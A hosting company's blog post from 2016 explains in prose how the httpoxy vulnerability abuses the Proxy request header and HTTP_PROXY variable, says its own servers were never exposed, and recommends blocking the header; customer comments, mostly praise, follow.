Safe from httpoxy Vulnerability or How Thinking Ahead Pays Off

A dangerous easy-to-exploit vulnerability called httpoxy discovered 15 years ago, reappeared again yesterday, leaving server-side website software potentially open to attackers. This security hole impacts a large number of PHP and CGI web-apps. This means that anything that runs on PHP, Apache, Go, HHVM, Python can be vulnerable. The exploit allows man-in-the-middle attacks that could compromise web servers and potentially access sensitive data or seize control of the code. Thanks to our unique in-house developed systems and some precautions taken ahead of time by our DevOps team, SiteGround customers are unaffected by the return of the vulnerability.

How does the exploit work?

The abuser crafts a specific Proxy HTTP header in a request to the application to set a common environment variable called HTTP_PROXY on the application’s server. The app then, due to a naming conflict uses the proxy server defined by that variable for any of its outgoing HTTP connections. In such manner if the attacker has pointed the HTTP_PROXY at a malicious server, you can intercept the web app’s connections to other systems and, depending on how the code is designed, potentially gain remote code execution. The best immediate mitigation is to block PROXY request headers as early as possible, and before they hit your application.

How we avoided being affected by the vulnerability now?

We have our own unique in-house PHP and CGI setup that we developed in 2007 and continue to maintain and improve until today. Way back then when our DevOps team started to develop this setup, they were aware of the potential fault in using the PROXY header. That’s why, as a precaution, they decided to exclude the PROXY header from our list of allowed environment parameters. This means that we don’t even need to unset the HTTP_PROXY header as the security advisors suggest in this case, we simply do not allow it to be included in any HTTP requests.

Thanks to our knowledgeable security and systems design team, we were able to predict the possibility of a reappearance of this vulnerability and we proactively designed our systems in a way to protect our clients.

Access email sent!

Sign Up For
More Awesome Content!

Subscribe to receive our monthly newsletters with the latest helpful content and offers from SiteGround.

Thanks!

Please check your email to confirm your subscription.

Daniel Kanchev

Director Product Development

Daniel is responsible for bringing new products to life at SiteGround. This involves handling all types of tasks and communication across multiple teams. Enthusiastic about technology, user experience, security and performance, you can never be bored hanging around him. Also an occasional conference speaker and travel addict.

Comments ( 26 )

author avatar

Eric

Jul 19, 2016

Good work Siteground Team! By far the #1 Hosting Service provider out there :)

Reply
author avatar

Angelina Micheva

Jul 20, 2016

Thank you, Eric!

Reply
author avatar

Alvin Gan

Jul 19, 2016

Thanks SiteGround DevOps for thinking ahead and develop great server performances with constant performance and security fixes

Reply
author avatar

Angelina Micheva

Jul 20, 2016

Our DevOps team is amazing and they are true experts in what they do so your sites are safe with us.

Reply
author avatar

kenny

Jul 20, 2016

Beautiful, good thinking all those years ago. Glad that you communicate this as well. Keeps us aware that you are working away behind the scenes to keep our sites safe.

Reply
author avatar

Erik Joling

Jul 20, 2016

Well spoken Kenny, I totally agree!

Reply
author avatar

Lauro

Jul 20, 2016

grazie alle vostre indagini adesso addirittura a tanti anni fa! ottimo lavoro di manutenzione cosi non mai la sicurezza dei nostri siti web!

Reply
author avatar

John Cope

Jul 20, 2016

It's great to know that if I happen upon an article about the exploit i don't need to be concerned. One less thing for me to do, thanks for posting

Reply
author avatar

abrham assefa

Jul 21, 2016

I proud the siteground Team, and am happy being user customer

Reply
author avatar

Chris Olsen

Aug 10, 2016

Thank you! Glad my sites are hosted with you. Let's me focus on the website and not worry about hosting.

Reply
author avatar

Alain

Aug 10, 2016

That's why I am a happy Siteground customer since years :)

Reply
author avatar

Brian A

Aug 10, 2016

Thank you yet again to all at SiteGround.com for helping to keep your networks better protected - and therefore all the websites installed on them, and for letting us know about some of the great work you do "in the background".

Reply
author avatar

Thomas Whittaker

Aug 10, 2016

#PeaceOfMind When you have SG has your BUDDY :)

Reply
author avatar

Jag

Aug 10, 2016

Thank you! It is comforting. Jag KudosWall.com

Reply
author avatar

aj

Aug 10, 2016

the best hosting services and support team. thanks siteground

Reply
author avatar

Alisa natal

Aug 11, 2016

You guys rock! Loving the decision to move myself and all my clients over to you. SO much better, you make life of managing a bunch of sites so much easier. Thanks!

Reply
author avatar

Ken Weill Lumacad

Aug 11, 2016

That's good news. I'm proud to be with SiteGround. Migrating to SiteGround was the best choice I made for my websites. Kudos to the SiteGround team.

Reply
author avatar

Rodel

Aug 11, 2016

Best Hosting Provider Ever :) Good Siteground.... I'm so Happy.................... 101 Best Hosting..

Reply
author avatar

Shayan

Aug 11, 2016

You were not my first web hosting, but seems like you are the last I will ever try :) Good luck SG.

Reply
author avatar

Geoff

Aug 11, 2016

Delighted with my switch in hosting to Siteground. A******* customer service and product. Thanks guys

Reply
author avatar

Jarold Villanueva

Aug 11, 2016

Nice work... Two thumbs up.... Best Hosting Ever... :-)

Reply
author avatar

Carla

Aug 11, 2016

Well done Team SiteGround! Thanks for keeping us updated.

Reply
author avatar

Jaswinder Kaur

Aug 11, 2016

I am happy to be SG customer! Thanks.

Reply
author avatar

Mohd Shahrizan Ahmad Yusof

Aug 13, 2016

Your Super Technical Team is second to none and a perfect match with your infamous Support Team which proven as best support in the world (as written in EVERY FORUMS / WEBS). I always wondered, if with your regular support already make us felt like VIP customers. Then I believe, with your so-called Premium Support will definitely make us feel like Royal Treatment! As in your technical team, you guys never stop to amazes us with your continuos dedication. I'm glad I chose SG as my first web-hosting company. After almost a year being your customer, I believe that is best decision I ever made.

Reply
author avatar

Jan

May 21, 2017

Hi everyone, I am planning to host an Django-cms app. Which python3 version(s) are you supporting? Kind regards, Jan Nusselder

Reply
author avatar

Hristo Pandjarov Siteground Team

May 22, 2017

Right now we have 2.7.5 and 2.4.3 available on our servers but we will be adding another version (3rd branch) for our customers shortly!

Reply

Start discussion